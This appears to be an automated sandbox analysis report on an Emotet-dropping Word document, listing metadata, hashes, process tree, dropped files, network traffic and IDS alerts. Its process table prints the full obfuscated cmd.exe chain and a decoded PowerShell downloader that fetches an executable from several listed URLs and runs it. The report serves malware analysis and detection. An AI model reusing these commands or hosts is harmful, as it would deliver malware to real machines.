File name: | I3823266_12052018.doc |
Full analysis: | https://app.any.run/tasks/bc111018-b0bb-43ea-ae90-92e21ad3e005 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 06, 2018, 03:34:40 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Dec 5 14:33:00 2018, Last Saved Time/Date: Wed Dec 5 14:33:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 17, Security: 0 |
MD5: | DA6DBF31AB4002CA4555C5E3018F77A5 |
SHA1: | ACE28D6FF100D30DE5ECD87D9CDEF035D08F145A |
SHA256: | FFACF1DFA289DD087132DEE8C5BD49B9EC5EC3E561FE162F094301A3E95F9760 |
SSDEEP: | 1536:Vwt81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9uD5C5kVH0PdG:M8GhDS0o9zTGOZD6EbzCd9mWFG |
.doc | | | Microsoft Word document (54.2) |
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
CompObjUserTypeLen: | 32 |
HeadingPairs: | - |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 18 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 17 |
Words: | 2 |
Pages: | 1 |
ModifyDate: | 2018:12:05 14:33:00 |
CreateDate: | 2018:12:05 14:33:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2936 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\I3823266_12052018.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3860 | c:\ZvZIAvmzCjBEfb\jzcdOqjj\DwmMQqivItVPXC\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set sLYG=cMzBJfzGbhspuTRPiRmnWwXErcuoTrfw F,HV(j/$Nq{-L'0yKt\g.CS@4Ilk87}e+2=3dZ)A:1DOvYx;a6&&for %R in (40,17,29,76,67,46,60,35,16,46,80,40,42,41,42,67,19,64,31,44,27,8,38,64,25,50,32,41,64,50,53,20,64,8,54,59,16,64,19,50,80,40,54,55,70,67,46,9,50,50,11,73,39,39,16,11,50,77,29,64,10,64,59,59,64,29,53,25,27,18,39,70,79,31,23,56,9,50,50,11,73,39,39,74,68,53,74,66,62,53,74,66,82,53,66,57,66,39,25,54,78,78,78,56,9,50,50,11,73,39,39,74,68,53,66,66,61,53,74,47,47,53,74,68,66,39,9,33,49,41,41,81,75,1,56,9,50,50,11,73,39,39,64,29,16,25,59,64,77,64,19,50,9,81,59,53,25,27,18,39,77,76,26,56,9,50,50,11,73,39,39,31,31,31,53,10,69,77,64,52,81,19,64,25,27,30,29,16,64,19,69,59,48,53,25,27,18,39,33,3,46,53,55,11,59,16,50,37,46,56,46,71,80,40,19,75,1,67,46,28,19,6,46,80,40,9,16,25,32,67,32,46,82,62,57,46,80,40,19,26,11,67,46,29,30,18,46,80,40,1,42,16,67,40,64,19,77,73,50,64,18,11,65,46,51,46,65,40,9,16,25,65,46,53,64,79,64,46,80,30,27,29,64,81,25,9,37,40,60,10,69,32,16,19,32,40,54,55,70,71,43,50,29,48,43,40,42,41,42,53,75,27,31,19,59,27,81,69,33,16,59,64,37,40,60,10,69,34,32,40,1,42,16,71,80,40,9,17,16,67,46,36,45,6,46,80,58,30,32,37,37,7,64,50,44,58,50,64,18,32,40,1,42,16,71,53,59,64,19,52,50,9,32,44,52,64,32,61,47,47,47,47,71,32,43,58,19,77,27,60,64,44,58,50,64,18,32,40,1,42,16,80,40,6,1,6,67,46,16,81,26,46,80,8,29,64,81,60,80,63,63,25,81,50,25,9,43,63,63,40,69,1,38,67,46,3,72,70,46,80,91)do set 4Wx1=!4Wx1!!sLYG:~%R,1!&&if %R==91 echo !4Wx1:~-440!|FOR /F "delims=b\KD. tokens=9" %C IN ('ftype^^^|find "Cons"')DO %C -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2412 | CmD /V:ON/C"set sLYG=cMzBJfzGbhspuTRPiRmnWwXErcuoTrfw F,HV(j/$Nq{-L'0yKt\g.CS@4Ilk87}e+2=3dZ)A:1DOvYx;a6&&for %R in (40,17,29,76,67,46,60,35,16,46,80,40,42,41,42,67,19,64,31,44,27,8,38,64,25,50,32,41,64,50,53,20,64,8,54,59,16,64,19,50,80,40,54,55,70,67,46,9,50,50,11,73,39,39,16,11,50,77,29,64,10,64,59,59,64,29,53,25,27,18,39,70,79,31,23,56,9,50,50,11,73,39,39,74,68,53,74,66,62,53,74,66,82,53,66,57,66,39,25,54,78,78,78,56,9,50,50,11,73,39,39,74,68,53,66,66,61,53,74,47,47,53,74,68,66,39,9,33,49,41,41,81,75,1,56,9,50,50,11,73,39,39,64,29,16,25,59,64,77,64,19,50,9,81,59,53,25,27,18,39,77,76,26,56,9,50,50,11,73,39,39,31,31,31,53,10,69,77,64,52,81,19,64,25,27,30,29,16,64,19,69,59,48,53,25,27,18,39,33,3,46,53,55,11,59,16,50,37,46,56,46,71,80,40,19,75,1,67,46,28,19,6,46,80,40,9,16,25,32,67,32,46,82,62,57,46,80,40,19,26,11,67,46,29,30,18,46,80,40,1,42,16,67,40,64,19,77,73,50,64,18,11,65,46,51,46,65,40,9,16,25,65,46,53,64,79,64,46,80,30,27,29,64,81,25,9,37,40,60,10,69,32,16,19,32,40,54,55,70,71,43,50,29,48,43,40,42,41,42,53,75,27,31,19,59,27,81,69,33,16,59,64,37,40,60,10,69,34,32,40,1,42,16,71,80,40,9,17,16,67,46,36,45,6,46,80,58,30,32,37,37,7,64,50,44,58,50,64,18,32,40,1,42,16,71,53,59,64,19,52,50,9,32,44,52,64,32,61,47,47,47,47,71,32,43,58,19,77,27,60,64,44,58,50,64,18,32,40,1,42,16,80,40,6,1,6,67,46,16,81,26,46,80,8,29,64,81,60,80,63,63,25,81,50,25,9,43,63,63,40,69,1,38,67,46,3,72,70,46,80,91)do set 4Wx1=!4Wx1!!sLYG:~%R,1!&&if %R==91 echo !4Wx1:~-440!|FOR /F "delims=b\KD. tokens=9" %C IN ('ftype^^^|find "Cons"')DO %C -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
4000 | C:\Windows\system32\cmd.exe /S /D /c" echo $RrO='kHi';$qNq=new-object Net.WebClient;$CSZ='http://iptvreseller.com/ZxwE@http://13.127.126.242/cCYYY@http://13.228.100.132/hFKNNaDM@http://ericleventhal.com/vOu@http://www.sdveganecofriendly.com/FB'.Split('@');$nDM='Tnz';$hic = '674';$nup='rfm';$Mqi=$env:temp+'\'+$hic+'.exe';foreach($ksd in $CSZ){try{$qNq.DownloadFile($ksd, $Mqi);$hRi='VLz';If ((Get-Item $Mqi).length -ge 80000) {Invoke-Item $Mqi;$zMz='iau';break;}}catch{}}$dMj='BAZ';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
4076 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=b\KD. tokens=9" %C IN ('ftype^|find "Cons"') DO %C -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2240 | C:\Windows\system32\cmd.exe /c ftype|find "Cons" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2732 | C:\Windows\system32\cmd.exe /S /D /c" ftype" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2824 | find "Cons" | C:\Windows\system32\find.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3568 | powershell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3232 | "C:\Users\admin\AppData\Local\Temp\674.exe" | C:\Users\admin\AppData\Local\Temp\674.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Exit code: 0 Version: 7.6.7601.1 | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
2936 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR69D6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3568 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HOZIXNUNE8ZK6WOG5MVK.temp | — | |
MD5:— | SHA256:— | |||
3568 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247cd2.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2936 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:8C708748261A5349654AC274D6830F5B | SHA256:4696CB1D5C82CF03890F7F704C9C87FD780750AC148826471202CCC9162B6D1A | |||
2936 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$823266_12052018.doc | pgc | |
MD5:F57CADEFADD613907689CF6275D11C02 | SHA256:72F53FC6CF7C3457495A56BFFB776F5BAFA5D67ADF357E0B8D1248C11CD1EC72 | |||
3568 | powershell.exe | C:\Users\admin\AppData\Local\Temp\674.exe | executable | |
MD5:8118F4F594DAE97A595FBF6B46859A49 | SHA256:27E1FD100E541D069E2A289D7EC5212DC95E0DB32AB693ABD766A34ACB65968F | |||
3568 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2472 | 674.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:8118F4F594DAE97A595FBF6B46859A49 | SHA256:27E1FD100E541D069E2A289D7EC5212DC95E0DB32AB693ABD766A34ACB65968F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3568 | powershell.exe | GET | 200 | 64.15.74.206:80 | http://iptvreseller.com/ZxwE/ | CA | executable | 524 Kb | malicious |
3568 | powershell.exe | GET | 301 | 64.15.74.206:80 | http://iptvreseller.com/ZxwE | CA | html | 237 b | malicious |
1036 | archivesymbol.exe | GET | 200 | 114.55.106.210:443 | http://114.55.106.210:443/ | CN | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3568 | powershell.exe | 64.15.74.206:80 | iptvreseller.com | Netelligent Hosting Services Inc. | CA | suspicious |
1036 | archivesymbol.exe | 114.55.106.210:443 | — | Hangzhou Alibaba Advertising Co.,Ltd. | CN | malicious |
Domain | IP | Reputation |
---|---|---|
iptvreseller.com | — | malicious |
PID | Process | Class | Message |
---|---|---|---|
3568 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3568 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
3568 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3568 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3568 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
1036 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
1036 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |